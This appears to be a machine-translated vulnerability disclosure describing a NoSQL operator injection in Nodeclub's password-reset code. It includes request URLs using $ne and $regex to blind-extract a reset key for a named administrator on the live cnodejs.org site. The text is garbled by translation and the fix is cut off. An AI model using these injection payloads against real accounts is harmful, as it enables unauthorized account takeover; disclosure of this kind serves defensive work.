Nodeclub injection vulnerability allows you to reset your password

Nodeclub injection vulnerability allows you to reset your password

This nodeclub (https://github.com/cnodejs/nodeclub/) may be used by a small number of people, get to play to download the nodeclub source code from github. \ Controllers \ sign. js

Exports. reset_pass = function (req, res, next) {var key = req. query. key; var name = req. query. name; User. getUserByNameAndKey (name, key, function (err, user) {if (! User) {res. status (403); return res. render ('your y/Your y', {error: 'information is incorrect, and the password cannot be reset. '});}

We can see that the key and name enter the User's getUserByNameAndKey \ proxy \ user. js without judgment.
Exports. getUserByNameAndKey = function (loginname, key, callback ){
User. findOne ({loginname: loginname, retrieve_key: key}, callback );
};
To test this problem, first of all, we set the goal to be one of the cnodejs managers alsotang, from his github can know that his mailbox is alsotang@gmail.com and then find the password at https://cnodejs.org/search_pass,

Next, based on the previous problems, it is not difficult to simply construct the following requests. Https://cnodejs.org/reset_pass? Name = alsotang & key [$ ne] = 111111111 where name is the target user name, so that the key is not equal to 1111111, a normal page is returned.

If we set a random key, for example: https://cnodejs.org/reset_pass? Name = alsotang & key = 111111111, an error page is returned:

In this way, we can blind the key parameter through $ regex. Example: https://cnodejs.org/reset_pass? Name [$ regex] = ^ alsotang & key [$ regex] = ^ 5 returns normal https://cnodejs.org/reset_pass? Name [$ regex] = ^ alsotang & key [$ regex] = ^ 6 Return Error https://cnodejs.org/reset_pass? Name [$ regex] = ^ alsotang & key [$ regex] = ^ 5f returns normal... test code: see "test code. After running the program,

Key:

Then take the key to reset the password. The password is reset to wooyun. After logging on ~~

See: https://cnodejs.org/user/alsotang personal introduction.

Solution:

Exports. reset_pass = function (req, res, next) {var key = req. query. key; var name = req. query. name ;..